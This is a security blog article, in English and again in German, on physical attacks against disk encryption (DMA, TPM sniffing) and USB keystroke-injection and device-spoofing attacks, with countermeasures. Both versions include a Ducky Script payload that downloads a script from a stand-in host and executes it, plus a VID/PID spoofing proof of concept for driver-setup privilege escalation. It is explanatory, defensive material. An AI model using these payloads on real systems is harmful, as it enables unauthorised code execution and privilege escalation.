Attacks via Peripheral Devices - Trade-off between Security and Usability

Attacks via Peripheral Devices

Trade-off between Security and Usability

Michael Schneider
by Michael Schneider
on December 09, 2021
time to read: 12 minutes

Keypoints

How to Handle Peripheral Devices

  • Full disk encryption and peripheral device management are used to protect the confidentiality of data and integrity of the system
  • DMA and sniffing attacks are possible if hard disk encryption is used without additional authentication
  • USB devices can be used to inject keystrokes and execute commands
  • Impersonation of specific devices enables a local-privacy-escalation attack through the driver setup
  • The trade-off between security and usability should be adjusted based on the threat model

The full disk encryption is a measure against illegitimate physical access to a device. With this the confidentiality of the data and the integrity of the system are ensured. On top of that, the device management controls which peripheral devices are allowed to be used. These hardening measures lead to restriction of functionality and require the acceptance of the users, which leads to a compromise between security and usability.

The trade-off between security and usability depends on the threat model. A threat model makes assumes about the ability and motivation of the attackers. The attack scenarios in this article are based on attackers with advanced skills and the motivation to conduct physical attacks, either to steal a device or to enter a building to gain access to devices or to plant hardware.

Attacks against Full Disk Encryption

The full disk encryption protects data from being accessed or manipulated. This is referred as encryption at rest. When booting the machine, a key is required to decrypt the hard disk. With Microsoft BitLocker, the BitLocker Encryption Key is stored in the Trusted Platform Module (TPM) of the machine. In the default configuration of BitLocker, the key is loaded from the TPM at start-up, stored in memory and the system starts up to the login screen without any additional form of authentication. This opens up attacks against the hard disk encryption.

DMA Attacks

A Direct Memory Access (DMA) attack is a side channel attack in which attackers misuse a high-speed interface with direct access to system memory as an attack vector. Such interfaces include FireWire, Thunderbolt, and PCI Express. Direct access to the system memory bypasses the operating system’s protection mechanisms.

If a system with hard disk encryption can be booted without pre-boot authentication, secrets such as keys or passwords can be extracted from the memory, or the running system can be manipulated using DMA attacks. The tool PCILeech developed by Ulf Frisk has become the “standard tool” for such attacks. In the article Practical DMA Attack on Windows 10, Jean-Christophe Delaunay describes how PCILeech was used to manipulate the login mask in the memory so that the system accepts any password for the local administrator account.

By introducing Input-Output Memory Management Units (IOMMU), such as Intel Virtualization Technology for Directed I/O (Intel VT-d), DMA attacks can be prevented. The usage of IOMMU is active by default in macOS and can be used in Windows by activating Virtualisation-Based-Security-Functions (VBS).

Sniffing Attacks

Without pre-boot authentication, the key is read from the TPM during the boot procedure and passed to the Boot Loader so that the hard disk can be decrypted. This communication happens via the Serial Peripheral Interface (SPI). Attackers can connect to the TPM chip on the device, listen to the SPI bus and thus extract the key. This requires a profound knowledge of the structure of the specific device and enough time to carry out the attack. The three articles Sniff, There Leaks my BitLocker Key, From Stolen Laptop to Inside the Company Network and Break into this CEO’s laptop describe such attacks in detail.

Countermeasures

One countermeasure against DMA attacks is the use of IOMM Units. This functionality must be activated in the BIOS/UEFI. As an additional measure, access to the BIOS/UEFI should be protected so that security functions cannot be deactivated. For Windows, the VBS function and the Secure Boot with DMA setting must be activated. Furthermore, the use of interfaces such as FireWire and Thunderbolt should be prevented via the group policy settings Prevent installation of devices that match any of these device IDs and Prevent installation of devices using drivers that match these device setup classes. Microsoft describes how to configure the settings in the article Blocking the SBP-2 driver and Thunderbolt controllers to reduce 1394 DMA and Thunderbolt DMA threats to BitLocker. Depending on the hardware support, the function Kernel DMA Protection can also be used.

To prevent sniffing attacks, pre-boot authentication must be done before decrypting the hard disk. For BitLocker, Microsoft describes the countermeasures in the article BitLocker Countermeasures. The group policy setting BitLocker Drive Encryption\Operating System Drives\Require additional authentication at startup must be set to one of the following values:

If a PIN is used, the setting Allow enhanced PINs for startup should also be used. Then the BitLocker key in the TPM is only released after successful authentication and it is not possible to perform a sniffing attack without the PIN.

Our PowerShell script HardeningKitty can be used to review the hardening settings.

USB attacks

No DMA attacks are possible via USB 2 and USB 3. The USB interface is nevertheless a popular attack target, also in combination with social engineering attacks. In the TV series Mr Robot the character Angela Moss receives a USB Rubber Ducky with instructions to connect it to a system in order to obtain the target’s credentials. The attack is described in detail in the article 15 Second Password Hack, Mr Robot Style. The USB Rubber Ducky connects as a Human Interface Device (HID), an input device such as a keyboard or mouse, and can therefore inject keystrokes. This opens a prompt window with administrative privileges, runs Invoke-Mimikatz and extracts the credentials. However, for this attack to be successful, a user with sufficient privileges must be logged in.

Rubber Ducky

Besides USB Rubber Ducky, a Teensy USB Development Board can also be used for such attacks. The Teensy is programmed with the development environment Teensyduino. With the USB Rubber Ducky, the language Ducky Script was also invented in 2010, which simplifies the programming of such attacks and has an easy-to-read syntax.

With the following Ducky Script example, a script can be loaded from the internet via PowerShell and executed. To do this, the Rubber Ducky only has to be connected to the computer, the rest of the process is executed automatically.

DELAY 3000
GUI r
DELAY 100 
STRING powershell.exe
ENTER
DELAY 100
STRING $Response = Invoke-WebRequest -Uri evil.example.org/script.txt
ENTER
DELAY 200
STRING Invoke-Expression($Response.Content)
ENTER

With Ducky Script all keystrokes are programmed, with GUI r the prompt Run is invoked and then the PowerShell shell is started and the commands to download and start the script are executed.

O.MG Cable

The O.MG Cable from MG is a different device for USB attacks. The cable is available as USB-C to USB-A or USB-C to Apple Lightning variants and the cables are hardly distinguishable from the original. A Wi-Fi chip is integrated into the cable so that the O.MG Cable can start its own Access Point or connect to a predefined WLAN. Then an attacker can access the front end and execute live commands in a script editor.

A possible attack would be to place the cable in an office and wait for someone to connect this to their device. Then the access point starts and attackers within wireless range can interact with the device via the cable. It is also possible to execute a payload when the device is plugged in, analogous to the Rubber Ducky.

The Twitter post Windows escalation with an OMG cable: from Guest account to System user demonstrates how a setup program of a device from the company Razer can be misused to gain local system rights on a system. In the process, it is pretended that a Razer product has been connected to the computer and an advanced setup with system rights is started through Windows Update. During the setup dialogue, a command prompt window can then be opened and the attacker gains system rights.

The O.MG Cable has an extended version of Ducky Script, which allows the definition of Vendor ID (VID) and Product ID (PID). This allows any USB device to be imitated. The operating system recognises which device it is based on the Vendor ID and the Product ID. In the form of a Proof-of-Concept Script, this looks as such:

VID 1532
PID 0073
DELAY 30000
SPACE

By using VID and PID the USB device is specified and the commands DELAY and SPACE are there to perform an action as if the device was active after the waiting time has elapsed. Windows recognises that a new device has been connected and attempts to install the appropriate drivers. Device manufacturers have the option of executing an extended setup in addition to drivers. This function is called “Device-Specific Co-installer” by Microsoft:https://docs.microsoft.com/en-us/windows-hardware/drivers/install/registering-a-device-specific-co-installer. If manufacturers run the setup with system rights, as in the case of Razer, and allow attackers to jump out of the installation dialogue, a privilege escalation vulnerability is possible.

With the USB Rubber Ducky, it is also possible to impersonate other USB devices. To do this, a file called vidpid.bin must be created in the file structure of the Rubber Ducky and contain VID and PID. This file can be created with the following command:

perl -e 'print pack "H*", "15320073"' > /path/to/sdcard/vidpid.bin

By probing VID and PID combinations, it is also possible to search for vulnerabilities in other driver installations. The vulnerability analyst Will Dormann has tried this out and documented it in a Twitter thread.

Countermeasures

In general, USB devices can be allowed or blocked via a USB device management solution. However, since HID devices are used in USB attacks and these device class is usually not blocked, this countermeasure is not effective. Other measures include restricting applications using application control solutions and running PowerShell in Constrained Language Mode. To detect the attack, other controls must be used, such as monitoring PowerShell and correlating events, for example, detecting the use of new hardware and then running commands and access to the local network or internet.

As a workaround, the use of Co-Installer can be disabled with the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Installer\DisableCoInstallers, the setting DisableCoInstallers should be set to the value 1. This setting can affect the use of new hardware and, depending on the device, it may not install correctly. However, the vulnerability must be fixed by Microsoft and the manufacturers of the respective devices, it should not be possible for interactive setup dialogues to be executed with system rights if a user does not have administrator rights.

Conclusion

Using hard disk encryption without additional authentication is vulnerable to DMA and sniffing attacks. It is not sufficient to enable hard disk encryption and omit pre-boot authentication for ease of use. The same applies to the USB interface, only device management and disabling of certain device types, such as Ethernet or Wi-Fi adapters, are not enough to block all attacks. If attackers have physical access to the devices, further measures are necessary that have an impact on the usability of the device. This is the classic dilemma of the trade-off between security and usability. Depending on the threat model, the scales should clearly tip to the side of security.

About the Author

Michael Schneider

Michael Schneider has been in IT since 2000. Since 2010 he is focused on information security. He is an expert at penetration testing, hardening and the detection of vulnerabilities in operating systems. He is well-known for a variety of tools written in PowerShell to find, exploit, and mitigate weaknesses. (ORCID 0000-0003-0772-9761)

Links

Is your data also traded on the dark net?

We are going to monitor the digital underground for you!

×
Forced Authentication

Forced Authentication

Michael Schneider

Network Provider

Network Provider

Michael Schneider

Farewell NTLM

Farewell NTLM

Michael Schneider

ContainerKitty

ContainerKitty

Michael Schneider

You want more?

Further articles available here

You need support in such a project?

Our experts will get in contact with you!

You want more?

Further articles available here

Angriffe über Peripheriegeräte - Kompromiss zwischen Sicherheit und Benutzbarkeit

Angriffe über Peripheriegeräte

Kompromiss zwischen Sicherheit und Benutzbarkeit

Michael Schneider
von Michael Schneider
am 09. Dezember 2021
Lesezeit: 12 Minuten

Keypoints

So kriegen Sie Peripheriegeräte in den Griff

  • Festplattenverschlüsselung und Verwaltung von Peripheriegeräten werden zum Schutz der Vertraulichkeit der Daten und Integrität des Systems eingesetzt
  • DMA- und Sniffing-Angriffe sind möglich wenn eine Festplattenverschlüsselung ohne zusätzliche Authentisierung eingesetzt wird
  • Über USB-Geräte können Tastenanschläge eingeschleust und Befehle ausgeführt werden
  • Die Imitierung von bestimmten Geräten ermöglicht eine Local-Privilege-Escalation-Attacke über das Treiber-Setup
  • Der Kompromiss zwischen Sicherheit und Benutzerbarkeit sollte anhand des Bedrohungsmodells angepasst werden

Die Festplattenverschlüsselung ist eine Massnahme gegen unerlaubten physischen Zugriff auf ein Gerät. Damit soll die Vertraulichkeit der Daten und die Integrität des Systems sichergestellt werden. Zusätzlich wird über die Geräteverwaltung kontrolliert, welche Peripheriegeräte verwendet werden dürfen. Diese Absicherung führt zur Einschränkung der Funktionalität und erfordert die Akzeptanz der Anwender, was zu einem Kompromiss zwischen Sicherheit und Benutzerbarkeit führt.

Die Abwägung zwischen Sicherheit und Benutzbarkeit ist abhängig vom Bedrohungsmodell (Threat Model). In einem Bedrohungsmodell wird unter anderem eine Annahme zur Fähigkeit und Motivation der Angreifer getroffen. Die Angriffsszenarien in diesem Artikel basieren auf Angreifer mit fortgeschrittenen Fähigkeiten und der Motivation physische Angriffe durchzuführen, sei es ein Gerät zu stehlen oder in ein Gebäude einzudringen um auf Geräte zuzugreifen oder Hardware zu platzieren.

Angriffe gegen Festplattenverschlüsselung

Die vollständige Verschlüsselung der Festplatte schützt Daten davor ausgelesen oder manipuliert zu werden. Dies wird als Verschlüsselung im Ruhezustand (Encryption at Rest) bezeichnet. Beim Starten des Geräts ist ein Schlüssel erforderlich, um die Festplatte entschlüsseln zu können. Bei Microsoft BitLocker wird der Schlüssel BitLocker Encryption Key im Trusted Platform Module (TPM) des Geräts abgelegt. In der Standardkonfiguration von BitLocker wird beim Start der Schlüssel aus dem TPM ausgelesen, in den Speicher geladen und das System bis zur Anmeldemaske gestartet, ohne dass eine weitere Form der Authentisierung notwendig ist. Dies eröffnet Angriffe gegen die Festplattenverschlüsselung.

DMA-Angriffe

Ein Direct-Memory-Access-Angriff (DMA) ist ein Seitenkanalangriff, bei dem Angreifer eine High-Speed-Schnittstelle mit direktem Zugriff auf den Systemspeicher als Angriffsvektor missbrauchen. Zu solchen Schnittstellen gehören FireWire, Thunderbolt und PCI Express. Durch den direkten Zugriff auf den Systemspeicher können die Schutzmechanismen des Betriebssystems umgangen werden.

Wenn ein System mit Festplattenverschlüsselung ohne Pre-Boot-Authentisierung gestartet werden kann, können mittels DMA-Angriffe Geheimnisse wie Schlüssel oder Passwörter aus dem Systemspeicher ausgelesen oder das System im laufenden Betrieb manipuliert werden. Seit Jahren dient das von Ulf Frisk entwickelte Tool PCILeech als “Standardwerkzeug” für solche Attacken. Im Artikel Practical DMA Attack on Windows 10 beschreibt Jean-Christophe Delaunay wie mit PCILeech die Anmeldemaske im Speicher manipuliert wurde, dass der Systemzugriff mit einem beliebigen Passwort und dem lokalen Administratoraccount möglich war.

Durch die Einführung von Input-Output Memory Management Units (IOMMU), wie beispielsweise Intel Virtualization Technology for Directed I/O (Intel VT-d), können DMA-Attacken abgewehrt werden. Die Verwendung von IOMMU ist standardmässig in macOS aktiv und kann bei Windows durch das Aktivieren von Virtualization-Based-Security-Funktionen (VBS) genutzt werden.

Sniffing-Angriffe

Ohne eine Pre-Boot-Authentisierung wird der Schlüssel im Startprozedere aus dem TPM ausgelesen und an den Boot Loader übergeben, damit die Festplatte entschlüsselt werden kann. Diese Kommunikation findet über das Serial Peripheral Interface (SPI) statt. Angreifer können sich mit dem TPM-Chip auf dem Gerät verbinden, dabei den SPI-Bus abhören und so den Schlüssel auslesen. Dazu ist fundiertes Wissen über den Aufbau des jeweiligen Geräts und genügend Zeit zur Durchführung des Angriffs notwendig. In den drei Artikeln Sniff, There Leaks my BitLocker Key, From Stolen Laptop to Inside the Company Network und Break into this CEO’s laptop werden solche Angriffe detailliert beschrieben.

Gegenmassnahmen

Eine Massnahme gegen DMA-Angriffe ist die Nutzung von IOMM Units. Diese Funktionalität muss im BIOS/UEFI aktiviert werden. Als weitere Massnahme sollte der Zugriff auf das BIOS/UEFI geschützt werden, damit Sicherheitsfunktionen nicht deaktiviert werden können. Bei Windows muss dazu die Funktion VBS und die Einstellung Secure Boot with DMA aktiviert werden. Zudem sollte über die Gruppenrichtlinieneinstellungen Prevent installation of devices that match any of these device IDs sowie Prevent installation of devices using drivers that match these device setup classes die Nutzung von Schnittstellen wie FireWire und Thunderbold unterbunden werden. Microsoft beschreibt die Konfiguration der Einstellungen unter dem Artikel Blocking the SBP-2 driver and Thunderbolt controllers to reduce 1394 DMA and Thunderbolt DMA threats to BitLocker. Je nach Hardware-Unterstützung kann zusätzlich die Funktion Kernel DMA Protection genutzt werden.

Damit Sniffing-Angriffe verhindert werden können, muss eine Pre-Boot-Authentisierung vor der Entschlüsselung der Festplatte stattfinden. Bei BitLocker beschreibt Microsoft die Gegenmassnahmen im Artikel BitLocker Countermeasures. Die Gruppenrichtlinieneinstellung BitLocker Drive Encryption\Operating System Drives\Require additional authentication at startup muss auf einen der folgenden Werte gesetzt werden:

Wenn eine PIN verwendet wird, sollte die Einstellung Allow enhanced PINs for startup ebenso genutzt werden. Danach wird der BitLocker-Schlüssel im TPM erst nach der erfolgreichen Authentisierung freigegeben und es ist nicht möglich einen Sniffing-Angriff ohne die PIN durchzuführen.

Zur Überprüfung der Hardening-Einstellungen kann unser PowerShell-Skript HardeningKitty eingesetzt werden.

USB-Angriffe

Über USB 2 und USB 3 sind keine DMA-Angriffe möglich. Die USB-Schnittstelle ist dennoch ein populäres Angriffsziel, auch in Kombination mit Social-Engineering-Angriffen. In der TV-Serie Mr Robot erhält die Figur Angela Moss ein USB Rubber Ducky mit der Anweisung dieses an ein System anzuschliessen, um an die Zugangsdaten der Zielperson zu gelangen. Der Angriff wird ausführlich im Artikel 15 Second Password Hack, Mr Robot Style beschrieben. Das USB Rubber Ducky meldet sich als Human Interface Device (HID) an, ein Eingabeberät wie eine Tastatur oder Maus, und kann daher Tastenabfolgen einspeisen. Damit wird ein Eingabeaufforderungsfenster mit administrativen Rechten geöffnet, das Tool Invoke-Mimikatz ausgeführt und die Zugangsdaten extrahiert. Damit dieser Angriff erfolgreich ist, muss jedoch ein Benutzer mit entsprechenden Berechtigungen angemeldet sein.

Rubber Ducky

Neben USB Rubber Ducky kann auch ein Teensy USB Development Board für solche Angriffe verwendet werden. Das Teensy wird mit der Entwicklungsumgebung Teensyduino programmiert. Mit dem USB Rubber Ducky wurde im Jahr 2010 auch die Sprache Ducky Script erfunden, welche die Programmierung von solchen Attacken vereinfacht und eine einfach lesbare Syntax hat.

Mit dem folgenden Ducky-Script-Beispiel kann über PowerShell ein Skript aus dem Internet geladen und ausgeführt werden. Dazu muss das Rubber Ducky nur mit dem Computer verbunden werden, der weitere Vorgang wird automatisch durchgeführt.

DELAY 3000
GUI r
DELAY 100 
STRING powershell.exe
ENTER
DELAY 100
STRING $Response = Invoke-WebRequest -Uri evil.example.org/script.txt
ENTER
DELAY 200
STRING Invoke-Expression($Response.Content)
ENTER

Mit Ducky Script werden sämtliche Tastenabfolgen programmiert, mit GUI r wird der Prompt Ausführen aufgerufen und danach die PowerShell Shell gestartet und die Befehle zum Herunterladen und Starten des Skripts ausgeführt.

O.MG Cable

Das O.MG Cable von MG ist ein anderes Gerät für USB-Angriffe. Das Kabel gibt es als Varianten USB-C zu USB-A oder USB-C zu Apple Lightning und die Kabel sind kaum vom Original zu unterscheiden. Im Kabel integriert ist ein Wi-Fi-Chip, sodass das O.MG Cable einen eigenen Access Point starten oder sich in ein vordefiniertes WLAN einwählen kann. Danach kann ein Angreifer auf das Frontend zugreifen und in einem Script Editor live Befehle ausführen.

Ein möglicher Angriff wäre das Kabel in einem Büro zu platzieren und darauf zu warten, bis dies jemand an sein Gerät anschliesst. Danach startet der Access Point und Angreifer in Funkreichweite können mit dem Gerät über das Kabel interagieren. Es ist auch möglich analog des Rubber Duckys eine Payload beim Einstecken des Geräts auszuführen.

In dem Twitter-Post Windows escalation with an OMG cable: from Guest account to System user wird demonstriert, wie ein Setupprogramm eines Geräts der Firma Razer missbraucht werden kann, um lokale Systemrechte auf einem System zu erlangen. Dabei wird vorgegeben, dass ein Razer-Produkt mit dem Computer verbunden wurde und über Windows Update wird ein erweitertes Setup mit Systemrechten gestartet. Im Verlauf des Setupdialogs kann danach ein Kommandoeingabefenster geöffnet werden und der Angreifer erlangt Systemrechte.

Das O.MG Cable verfügt über eine erweiterte Version von Ducky Script, welche die Definition von Vendor ID (VID) und Product ID (PID) erlaubt. Damit kann jedes beliebige USB-Gerät imitiert werden. Das Betriebssystem erkennt anhand der Vendor ID und der Product ID um welches Gerät es sich handelt. Als Proof-of-Concept-Skript sieht dies wie folgt aus:

VID 1532
PID 0073
DELAY 30000
SPACE

Mittel VID und PID wird das USB-Gerät spezifiziert und die Befehle DELAY und SPACE sind dazu da, um nach Ablauf der Wartezeit eine Aktion durchzuführen, als wäre das Gerät aktiv. Windows erkennt, dass ein neues Gerät verbunden wurde und versucht die passenden Treiber zu installieren. Gerätehersteller haben die Möglichkeit neben Treiber auch ein erweitertes Setup auszuführen. Die Funktion wird von Microsoft als Device-Specific Co-installer bezeichnet. Wenn nun Hersteller das Setup, wie im Falle von Razer, mit Systemrechten starten und es Angreifer ermöglichen aus dem Installationsdialog abzuspringen, ist eine Privilege-Escalation-Schwachstelle möglich.

Mit dem USB Rubber Ducky ist es ebenfalls möglich andere USB-Geräte zu imitieren. Dazu muss eine Datei namens vidpid.bin in der Dateistruktur des Rubber Ducky angelegt werden und VID und PID enthalten. Diese Datei kann beispielsweise mit folgendem Befehl erstellt werden:

perl -e 'print pack "H*", "15320073"' > /path/to/sdcard/vidpid.bin

Mit Durchprobieren von VID- und PID-Kombinationen kann in anderen Treiberinstallationen auch nach Schwachstellen gesucht werden. Der Schwachstellenanalyst Will Dormann hat dies ausprobiert und in einem Twitter-Thread dokumentiert.

Gegenmassnahmen

Grundsätzlich können USB-Geräte über eine USB Geräteverwaltung erlaubt oder blockiert werden. Da bei USB-Angriffen jedoch HID-Geräte verwendet werden und diese in der Regel nicht blockiert werden, ist diese Massnahme nicht wirksam. Flankierende Massnahmen sind das Einschränken von Anwendungen mittels Application-Control-Lösungen und das Betreiben von PowerShell im Constrained Language Mode. Um den Angriff zu erkennen, müssen andere Kontrollen eingesetzt werden, wie die Überwachung PowerShell und die Korrelation von Ereignissen, beispielsweise die Erkennung der Verwendung einer neuen Hardware und die anschliessende Ausführung von Befehlen und Netzwerk-/Internetzugriff.

Als Workaround kann die Verwendung von Co-Installer durch den Registry-Schlüssel HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Installer\DisableCoInstallers deaktiviert werden, die Einstellung DisableCoInstallers sollte auf den Wert 1 gesetzt werden. Diese Einstellung kann die Nutzung von neuer Hardware beeinträchtigen und je nach Gerät kann dieses nicht korrekt installiert werden. Die Schwachstelle muss jedoch von Microsoft und den jeweiligen Geräteherstellern behoben werden, es sollte nicht möglich sein, dass interaktive Setupdialoge mit Systemrechten ausgeführt werden, wenn ein Benutzer über keine Administratorenrechte verfügt.

Fazit

Die Verwendung einer Festplattenverschlüsselung ohne zusätzlichen Authentisierung ist anfällig gegen DMA- und Sniffing-Angriffe. Es reicht nicht aus die Festplattenverschlüsselung zu aktivieren und aus Bedienungsfreundlichkeit auf eine Pre-Boot-Authentisierung zu verzichten. Das gleiche gilt für die USB-Schnittstelle, nur eine Geräteverwaltung und Deaktivieren von bestimmten Gerätetypen, wie Ethernet- oder Wi-Fi-Adapter, reichen nicht um alle Angriffe zu blocken. Wenn Angreifer physischen Zugriff auf die Geräte haben, sind weitere Massnahmen notwendig, die einen Einfluss auf die Benutzbarkeit des Geräts haben. Hierbei handelt es sich um das klassische Dilemma beim Kompromiss zwischen Sicherheit und Bedienbarkeit. Je nach Bedrohungsmodell sollte die Waagschale klar zur Seite der Sicherheit kippen.

Über den Autor

Michael Schneider

Michael Schneider arbeitet seit dem Jahr 2000 in der IT. Im Jahr 2010 hat er sich auf die Informationssicherheit spezialisiert. Zu seinen Aufgaben gehören das Penetration Testing, Hardening und das Aufspüren von Schwachstellen in Betriebssystemen. Er ist bekannt für eine Vielzahl in PowerShell geschriebener Tools zum Finden, Ausnutzen und Beheben von Schwachstellen. (ORCID 0000-0003-0772-9761)

Links

Werden auch Ihre Daten im Darknet gehandelt?

Wir führen gerne für Sie ein Monitoring des Digitalen Untergrunds durch!

×
Network Time Security

Network Time Security

Michael Schneider

Web-Proxy mit Kerberos

Web-Proxy mit Kerberos

Michael Schneider

Forced Authentication

Forced Authentication

Michael Schneider

Network Provider

Network Provider

Michael Schneider

Sie wollen mehr?

Weitere Artikel im Archiv

Sie brauchen Unterstützung bei einem solchen Projekt?

Unsere Spezialisten kontaktieren Sie gern!

Sie wollen mehr?

Weitere Artikel im Archiv